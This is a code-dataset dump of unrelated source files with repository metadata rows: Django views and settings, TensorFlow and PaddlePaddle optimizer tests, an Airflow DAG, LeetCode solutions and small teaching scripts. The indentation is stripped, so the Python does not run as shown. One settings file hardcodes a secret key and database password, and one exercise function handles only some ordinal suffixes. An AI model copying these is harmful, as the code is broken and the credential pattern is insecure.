post= form.save(commit=False)
post.topic = topic
post.created_by = request.user
post.save()
return redirect('topic_posts', pk=pk, topic_pk= topic_pk)
else:
form =PostForm()
return render(request, 'reply_topic.html', {'topic':topic, 'board':board, 'form':form})
| [
"7990satyam200@gmail.com"
] | 7990satyam200@gmail.com |
d50399a4eaf3be5ae62e3552b7e3c06a7c689c23 | e14605612c96d450bea1fca7fa9963105b6452fb | /tensorflow/python/training/ftrl_test.py | eb581048f165c2cfcebeff4238941b043d138053 | [
"Apache-2.0"
] | permissive | Yangqing/tensorflow | 0bb9259398eac98dc8e9f48cc0b7506f4d5f8a24 | 18792c1fce7e12d36c0f1704cff15ed820cc6ff5 | refs/heads/master | 2023-06-20T21:11:52.483377 | 2015-11-11T21:16:55 | 2015-11-11T21:16:55 | 45,876,905 | 2 | 2 | null | 2015-11-11T21:16:55 | 2015-11-10T00:38:20 | C++ | UTF-8 | Python | false | false | 8,845 | py | """Functional tests for Ftrl operations."""
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class FtrlOptimizerTest(tf.test.TestCase):
def testFtrlwithoutRegularization(self):
with self.test_session() as sess:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.60260963, -4.29698515]),
v0_val)
self.assertAllClose(np.array([-0.28432083, -0.56694895]),
v1_val)
def testFtrlwithoutRegularization2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.55607247, -3.98729396]),
v0_val)
self.assertAllClose(np.array([-0.28232238, -0.56096673]),
v1_val)
def testFtrlWithL1(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-7.66718769, -10.91273689]),
v0_val)
self.assertAllClose(np.array([-0.93460727, -1.86147261]),
v1_val)
def testFtrlWithL1_L2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=2.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-0.24059935, -0.46829352]),
v0_val)
self.assertAllClose(np.array([-0.02406147, -0.04830509]),
v1_val)
def applyOptimizer(self, opt, steps=5, is_sparse=False):
if is_sparse:
var0 = tf.Variable([[0.0], [0.0]])
var1 = tf.Variable([[0.0], [0.0]])
grads0 = tf.IndexedSlices(tf.constant([0.1], shape=[1, 1]),
tf.constant([0]),
tf.constant([2, 1]))
grads1 = tf.IndexedSlices(tf.constant([0.02], shape=[1, 1]),
tf.constant([1]),
tf.constant([2, 1]))
else:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
sess = tf.get_default_session()
v0_val, v1_val = sess.run([var0, var1])
if is_sparse:
self.assertAllClose([[0.0], [0.0]], v0_val)
self.assertAllClose([[0.0], [0.0]], v1_val)
else:
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run Ftrl for a few steps
for _ in range(steps):
update.run()
v0_val, v1_val = sess.run([var0, var1])
return v0_val, v1_val
# When variables are intialized with Zero, FTRL-Proximal has two properties:
# 1. Without L1&L2 but with fixed learning rate, FTRL-Proximal is identical
# with GradientDescent.
# 2. Without L1&L2 but with adaptive learning rate, FTRL-Proximal is identical
# with Adagrad.
# So, basing on these two properties, we test if our implementation of
# FTRL-Proximal performs same updates as Adagrad or GradientDescent.
def testEquivAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1),
is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseGradientDescentwithoutRegularizaion(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0), is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivGradientDescentwithoutRegularizaion(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
if __name__ == "__main__":
tf.test.main()
| [
"keveman@gmail.com"
] | keveman@gmail.com |
fb7af8fb50ff0d4a61bd2de7217ddf3e1061b0b9 | 274e7e18a87d524244c8de973ae74bec536382c9 | /markdown/files/001/2017-02-15-ordianal.py | 51d8496ae731b4bf8a0a3212dac20ee4d4e36060 | [] | no_license | tychonievich/cs1110s2017 | 469e3ecf0c056d7ffb3fb8f8b821eb5697b66aa0 | ce22f3f2872ed0bf1e0d157cc4c3898da2297a0c | refs/heads/master | 2021-01-12T01:58:21.947320 | 2017-07-17T12:22:29 | 2017-07-17T12:22:29 | 78,453,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | def ordinal(n):
'''1 -> 1st, 2 -> 2nd, 3 -> 3rd, 4 -> 4th, 5 -> 5th, ..., 12 -> 12th, 321 -> 321st, ...'''
# int -> str
# str + suffix
# determine the suffix (usually th, unless it isn't)
suffix = 'th'
if (n % 10) == 2:
suffix = 'nd'
s = str(n)
answer = s + suffix
return answer
print(ordinal(1))
print(ordinal(2))
print(ordinal(12))
print(ordinal(22))
print(ordinal(202))
print(ordinal(10))
print(ordinal(13)) | [
"tychonievich@gmail.com"
] | tychonievich@gmail.com |
98a9cbb0416283cf6ec743200af9b6aa132978eb | 3a7179882464ab8a85c46d067d17368d52a6ec4a | /dags/parallel_subdag.py | 2b5b1dd269014b27ccb273287e144fe7ea549f8e | [] | no_license | amrutprabhu/airflow-workouts | 9ce0882a168902c7d7ba51c754aade6b420b8012 | 2f2c9253f01b6a020f632e96eb3601b148f370c8 | refs/heads/master | 2023-04-12T04:21:07.291586 | 2021-04-21T15:52:54 | 2021-04-21T15:52:54 | 357,298,900 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 922 | py | from airflow.models import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.subdag import SubDagOperator
from datetime import datetime
from pandas import json_normalize
import json
from subdags.subdag_parallel_dag import subdag_parallel_dag
default_args = {
'start_date': datetime(2020, 1, 1)
}
with DAG('parallel_sub_dag',
schedule_interval='@daily',
default_args=default_args,
catchup=False) as dag:
task_1 = BashOperator(
task_id='task_1',
bash_command="sleep 3"
)
processing = SubDagOperator(
task_id = "processing_task",
subdag= subdag_parallel_dag('parallel_sub_dag', 'processing_task', default_args)
)
task_4 = BashOperator(
task_id ='task_4',
bash_command="sleep 3"
)
task_1 >> processing >> task_4
| [
"amrutprabhu42@gmail.com"
] | amrutprabhu42@gmail.com |
06bd8dc867e8a5440e6d2b59a233e76c70a4b767 | dbb4c9e2ebde90f479b58ef838c1fecfad1803ec | /portfolio/settings.py | f2f0faeda899c2661e6f375f566a6ac8b84791ed | [] | no_license | Kundan-Raj/Portfolio | b09b7c1e4f3d5e95e086a1f3a6e6a14bc13957d5 | f865300c604f3f615a889a0aeb3efe98b7dedb1a | refs/heads/master | 2022-12-18T16:33:32.688281 | 2020-09-30T06:55:58 | 2020-09-30T06:55:58 | 299,830,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,437 | py | """
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')eqqkfjr%jn7h2-p)zzgwg5v2f*wjs+ts)&iai2hczpozyz^$f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'courses.apps.CoursesConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
#'ENGINE': 'django.db.backends.sqlite3',
#'NAME': BASE_DIR / 'db.sqlite3',
'ENGINE': 'django.db.backends.postgresql',
'NAME':'portfoliodb',
'USER':'postgres',
'PASSWORD':'575658',
'HOST':'localhost',
'PORT':'5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/London'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
| [
"kundanr387@gmail.com"
] | kundanr387@gmail.com |
b2747e9aab89fd9bf82411e133d74e9ff9f2aa70 | 141facf5b402a0d91c7efea7fc18d6f4b9db0239 | /investissement/migrations/0001_initial.py | 32cf61b902d027cada12b0a2df42042c8034637a | [] | no_license | AssekoudaSamtou/NTI-APP | 79aae80ade80a5385454d119e1224fc70f865679 | 78bce3863f8e45292e79f9c995471efeff9c98d1 | refs/heads/master | 2022-12-15T23:19:44.942182 | 2020-03-21T16:54:40 | 2020-03-21T16:54:40 | 241,113,515 | 0 | 0 | null | 2022-12-08T03:37:52 | 2020-02-17T13:24:38 | JavaScript | UTF-8 | Python | false | false | 775 | py | # Generated by Django 2.2.7 on 2020-01-06 18:30
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Investissement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('montant', models.DecimalField(decimal_places=2, max_digits=10)),
('date_investissement', models.DateField(default=datetime.date.today)),
('date_decompte', models.DateField(default=datetime.date.today)),
('duree', models.PositiveSmallIntegerField(default=1)),
],
),
]
| [
"christophe1999da@gmail.com"
] | christophe1999da@gmail.com |
a121f41b3cc1380246409f13814789b0c1093fa0 | 0d5c77661f9d1e6783b1c047d2c9cdd0160699d1 | /python/paddle/fluid/tests/unittests/test_parallel_executor_test_while_train.py | 252793944462244539084a288e5259f216359650 | [
"Apache-2.0"
] | permissive | xiaoyichao/anyq_paddle | ae68fabf1f1b02ffbc287a37eb6c0bcfbf738e7f | 6f48b8f06f722e3bc5e81f4a439968c0296027fb | refs/heads/master | 2022-10-05T16:52:28.768335 | 2020-03-03T03:28:50 | 2020-03-03T03:28:50 | 244,155,581 | 1 | 0 | Apache-2.0 | 2022-09-23T22:37:13 | 2020-03-01T13:36:58 | C++ | UTF-8 | Python | false | false | 3,770 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle.fluid as fluid
import numpy as np
import unittest
import os
def simple_fc_net():
img = fluid.layers.data(name='image', shape=[784], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
hidden = img
for _ in xrange(4):
hidden = fluid.layers.fc(
hidden,
size=200,
act='tanh',
bias_attr=fluid.ParamAttr(
initializer=fluid.initializer.Constant(value=1.0)))
prediction = fluid.layers.fc(hidden, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=prediction, label=label)
loss = fluid.layers.mean(loss)
return loss
class ParallelExecutorTestingDuringTraining(unittest.TestCase):
def check_network_convergence(self, use_cuda, build_strategy=None):
os.environ['CPU_NUM'] = str(4)
main = fluid.Program()
startup = fluid.Program()
with fluid.program_guard(main, startup):
loss = simple_fc_net()
test_program = main.clone(for_test=True)
opt = fluid.optimizer.SGD(learning_rate=0.001)
opt.minimize(loss)
batch_size = 32
image = np.random.normal(size=(batch_size, 784)).astype('float32')
label = np.random.randint(0, 10, (batch_size, 1), dtype="int64")
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup)
feed_dict = {'image': image, 'label': label}
train_exe = fluid.ParallelExecutor(
use_cuda=use_cuda,
loss_name=loss.name,
main_program=main,
build_strategy=build_strategy)
test_exe = fluid.ParallelExecutor(
use_cuda=use_cuda,
main_program=test_program,
share_vars_from=train_exe,
build_strategy=build_strategy)
for i in xrange(5):
test_loss, = test_exe.run([loss.name], feed=feed_dict)
train_loss, = train_exe.run([loss.name], feed=feed_dict)
self.assertTrue(
np.allclose(
train_loss, test_loss, atol=1e-8),
"Train loss: " + str(train_loss) + "\n Test loss:" +
str(test_loss))
def test_parallel_testing(self):
build_strategy = fluid.BuildStrategy()
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.AllReduce
self.check_network_convergence(
use_cuda=True, build_strategy=build_strategy)
self.check_network_convergence(
use_cuda=False, build_strategy=build_strategy)
def test_parallel_testing_with_new_strategy(self):
build_strategy = fluid.BuildStrategy()
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce
self.check_network_convergence(
use_cuda=True, build_strategy=build_strategy)
self.check_network_convergence(
use_cuda=False, build_strategy=build_strategy)
if __name__ == '__main__':
unittest.main()
| [
"xiaoyichao@haohaozhu.com"
] | xiaoyichao@haohaozhu.com |
d3e74923b973159dee2736519dce313ed3d4a166 | c51c31f864df0c262d593255c6567b521a3bc224 | /500/500.py | e6a7b33678aed844affd66bbd949bdcc0e565a5e | [] | no_license | huangke19/LeetCode | dd91091e25f7873ddd762afc708b722a71edd2ba | 46787a163ddbb1f6a5cab5acb57ca55731fb2a54 | refs/heads/master | 2021-05-05T02:31:31.044078 | 2018-12-17T04:58:19 | 2018-12-17T04:58:19 | 119,777,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
1. 检查先决条件
2. 定义子程序要解决的问题
3. 为子程序命名
4. 决定如何测试子程序
5. 在标准库中搜寻可用的功能
6. 考虑错误处理
7. 考虑效率问题
8. 研究算法和数据类型
9. 编写伪代码
1. 首先简要地用一句话来写下该子程序的目的,
2. 编写很高层次的伪代码
3. 考虑数据
4. 检查伪代码
10. 在伪代码中试验一些想法,留下最好的想法
'''
class Solution(object):
def findWords(self, words):
"""
:type words: List[str]
:rtype: List[str]
"""
a = set('qwertyuiop')
b = set('asdfghjkl')
c = set('zxcvbnm')
res = []
for word in words:
t = set(word.lower())
if t & a == t:
res.append(word)
if t & b == t:
res.append(word)
if t & c == t:
res.append(word)
return res
| [
"huangke@samsource.cn"
] | huangke@samsource.cn |
e12f70d1d4228dc05aa06bfdc0c7ba6a5cbd33c7 | 1bfd656374013b9a30612aca89921dc275c810f3 | /test/test_DTO_Parser_class/test_Filter_class/test_Filter_Main_Class.py | af6a3bc1ff622284fc965112eb76d10519dd959d | [] | no_license | clemparpa/paris_sportifs_data_traitement_v1.3 | ecc17906933bba4643f9f6535c25f00ff413705e | 93b1f6a996c8019ff31895dbe18e702dbef8e403 | refs/heads/master | 2023-01-24T05:45:16.381444 | 2020-08-17T07:25:04 | 2020-08-17T07:25:04 | 285,244,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,430 | py | import operator
from app.DTO_Parser_class.Filter_class import Filter_Main_Class as script
from app.DAO_class.DAO_FineDataModel import FDMCompModel
from app.DAO_functions import CRUD_functions as Crud
import pytest
class TestCompModelFilter:
@classmethod
def setup_method(cls):
comp_model = FDMCompModel.parse_obj(Crud.select_comp(2021))
cls.comp_filter_object = script.CompModelMainFilter(comp_model)
def test_filter_args_exception_raiser(self):
with pytest.raises(AttributeError):
self.comp_filter_object.filter(sort_matches=False, sort_key="random_string")
with pytest.raises(AttributeError):
self.comp_filter_object.filter(sort_matches=True)
def test_filter_separed_match_no_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
self.comp_filter_object.filter(all_matches=False, sort_matches=False, sort_key=None)
assert comp_model_before == self.comp_filter_object.comp_model
def test_filter_separed_match_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
for team in comp_model_before.teams:
team.played_as_home_matches.sort(key=operator.attrgetter("utc_date"))
team.played_as_away_matches.sort(key=operator.attrgetter("utc_date"))
self.comp_filter_object.filter(all_matches=False, sort_matches=True, sort_key="utc_date")
assert comp_model_before == self.comp_filter_object.comp_model
def test_filter_all_match_no_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
self.comp_filter_object.filter(all_matches=True, sort_matches=False, sort_key=None)
for team_before, team_after in zip(comp_model_before.teams, self.comp_filter_object.comp_model.teams):
assert (team_before.played_as_home_matches + team_before.played_as_away_matches) == team_after.match_list_
def test_filter_all_match_sort(self):
comp_model_before = self.comp_filter_object.comp_model.copy()
self.comp_filter_object.filter(all_matches=True, sort_matches=True, sort_key="utc_date")
for team_before, team_after in zip(comp_model_before.teams, self.comp_filter_object.comp_model.teams):
assert (sorted(team_before.played_as_home_matches + team_before.played_as_away_matches, key=operator.attrgetter("utc_date"))) == team_after.match_list_
| [
"clem.parpaillon@gmail.com"
] | clem.parpaillon@gmail.com |
10715d27aa4f7e90889e6c3656f863943f5b87a0 | 04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29 | /404/Solution.py | fc03385d6cf998b49aa9ceaf42511cad45ba0ca5 | [] | no_license | zhangruochi/leetcode | 6f739fde222c298bae1c68236d980bd29c33b1c6 | cefa2f08667de4d2973274de3ff29a31a7d25eda | refs/heads/master | 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,489 | py | """
Find the sum of all left leaves in a given binary tree.
Example:
3
/ \
9 20
/ \
15 7
There are two left leaves in the binary tree, with values 9 and 15 respectively. Return 24.
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def sumOfLeftLeaves(self, root):
"""
:type root: TreeNode
:rtype: int
"""
def iter(root,isleaft):
if not root:
return 0
elif not root.left and not root.right and isleaft:
return root.val
else:
return iter(root.left,True) + iter(root.right,False)
return iter(root,False)
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sumOfLeftLeaves(self, root: TreeNode) -> int:
res = 0
def traverse(root,flag):
nonlocal res
if not root:
return
if not root.left and not root.right and flag:
res += root.val
traverse(root.left,1)
traverse(root.right,0)
traverse(root,0)
return res
| [
"zrc720@gmail.com"
] | zrc720@gmail.com |
cb6228db4a6daadd3dacd0051ad891abbe1a94fe | d3cb0b5c54034b956b35dd211db2549f362ba6bf | /length.py | 292aaad2b00c07775a9c71961102443b9aae00f4 | [
"Apache-2.0"
] | permissive | eva-koester/hackathon_tunnel | 305668d1f938e4f60f3fedc1fa1f61629540f562 | 85f34e1568fa1de166164ca96958b9bc20086ace | refs/heads/master | 2020-04-02T02:20:59.992995 | 2018-10-22T18:11:02 | 2018-10-22T18:11:02 | 153,891,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import json
import matplotlib.pyplot as plt
from geopandas import GeoDataFrame
df = GeoDataFrame.from_file("Tunnel/MapInfoRelationen/tunnel.MIF")
print(df.columns)
print(df.laenge)
print(type(df))
print(df.laenge.sum())
print(df.laenge.min())
print(df.laenge.max())
print(df.laenge.median())
print(df.bezeichnung.nunique())
hist = df.laenge.hist(bins=25)
plt.show()
| [
"eva.maria.koester@gmx.de"
] | eva.maria.koester@gmx.de |
11536b5271ae3d430e3c66740a0fa2cbea21f19b | 0089e87d4e9bef9df4fe6611a79a13225c01b98e | /mB3-python-03/script-b0307-01.py | e9ade0c7dc5e3463fdb7dbdf2ba8361e5a78fbb1 | [] | no_license | odvk/sf-pyfullstack-c02 | 63ea99bf6bea79113fe75e0e6f4e5cdfb4a90aca | 4521b9652264d03c082a9390dbcdcec2586c8fd1 | refs/heads/master | 2020-06-25T06:48:50.944156 | 2019-08-17T06:08:02 | 2019-08-17T06:08:02 | 199,236,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,128 | py | # В3.7 Ещё раз про “магические” методы
class User:
def __init__(self):
print("Конструирую пользователя")
self.name = "Гелиозавр"
# конструктор это функция определяемая внутри класса;
# конструктор называется __init__ (два подчёркивания с двух сторон от названия);
# конструктор это функция: есть формальный аргумент, который называется 'self';
# внутри конструктора фактический аргумент self можно использовать чтобы изменять поля манипулируемого объекта.
u1 = User()
u2 = User()
u2.name = "Орнитишийлар"
print(u1.name, u2.name)
print("----------------------------")
# В нашем случае мы хотим сделать так, чтобы когда User участвует в выражении как строка
# (то есть приводится к строке) использовалось поле name. Это делается таким кодом:
class User1:
def __init__(self):
print("Конструирую пользователя")
self.name = "Гелиозавр"
def __str__(self):
return self.name
u1 = User1()
print(u1)
print("----------------------------")
# Дополним нашу модель пользователя и перепишем немного определение класса:
class User2:
def __init__(self, email, name="Гелиозавр"):
self.email = email
self.name = name
def __str__(self):
return "%s <%s>" % (self.name, self.email)
u1 = User2("test@example.com")
u2 = User2(name="Орнитишийлар", email="zakusi@pet.ru")
print(u1, u2)
print("----------------------------")
# Обратите внимание, что некоторые примеров в таблице выше используют два аргумента,
# так как они описывают какое-то парное действие. К примеру, мы в нашем сервисе можем считать,
# что если у нас есть два пользователя с одинаковым е-мейлом, то это два равных пользователя.
# Чтобы использовать эту проверку в коде мы определим наш класс пользователя так:
class User3:
def __init__(self, email, name="Гелиозавр"):
self.email = email
self.name = name
def __str__(self):
return "%s <%s>" % (self.name, self.email)
def __eq__(self, other):
return self.email.lower() == other.email.lower()
u1 = User3(name="Гелиозавр", email="RAWR@mail.ru")
u2 = User3(name="Орнитишийлар", email="rawr@mail.ru")
print(u1, u2)
print("Это один и тот же пользователь?", u1 == u2)
| [
"kustov.dv@gmail.com"
] | kustov.dv@gmail.com |
d4aee2bbb05e098682209381c146640801f79e1b | 1c945dcc6f525de77245586ea32dac11ccd04208 | /src/server/config.py | 8cbce389829ed4e436b32f5e2eba5a866a590493 | [] | no_license | FeverTeam/CloudSlides-Win_python | c009606de38f12e0ee95ebd84e84158d40f90e0c | 6b7b4ca0bdc2b4562a55c471bd8c75d236bec695 | refs/heads/master | 2021-01-24T06:12:47.668042 | 2014-06-08T10:48:48 | 2014-06-08T10:48:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | # -*- coding: UTF-8 -*-
#mongoDB config
MONGO_SVRIP = "127.0.0.1"
MONGO_SVRPORT = 27017
MONGO_PPTDB = 'LivePPT-PPT'
MONGO_IMGDB = 'LivePPT-Img'
#redis config
REDIS_SVRIP = "127.0.0.1"
REDIS_SVRPORT = 6379
PPT_CONVERT_REQMQ = 'LivePPT-Convert-ReqMq'
PPT_CONVERT_RESPMQ = 'LivePPT-Convert-RespMq'
UTF8_ENCODING = "UTF-8"
POWERPOINT_APPLICATION_NAME = "PowerPoint.Application"
| [
"itzijing@gmail.com"
] | itzijing@gmail.com |
b9e21fc786f1b4294411835f09300d55ac07eea1 | b351c11aa3d9ae637bb60571d54005407a031079 | /data_logging/light_and_temperature.py | 9f0399150f248ddcc2af3c40e53aefa83d98fba3 | [] | no_license | VectorSpaceHQ/Intermediate-Raspberry-Pi-Workshop | e0909202356997f4605facc4556a2c71ba462497 | 8c88d85d0194956576970f7a2b8495d0d6eff0d9 | refs/heads/master | 2020-12-03T23:55:38.822778 | 2016-08-28T17:29:47 | 2016-08-28T17:29:47 | 66,735,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | #!/usr/bin/env python3
from w1thermsensor import W1ThermSensor
from gpiozero import LightSensor
from time import sleep
tempSensor = W1ThermSensor()
lightSensor = LightSensor(18, charge_time_limit=0.05)
while True:
temperature = tempSensor.get_temperature(W1ThermSensor.DEGREES_F)
light = lightSensor.value
print ('Light: %0.2f, Temperature %0.2f' % (light, temperature))
sleep(1)
| [
"jordan.goulder@gmail.com"
] | jordan.goulder@gmail.com |
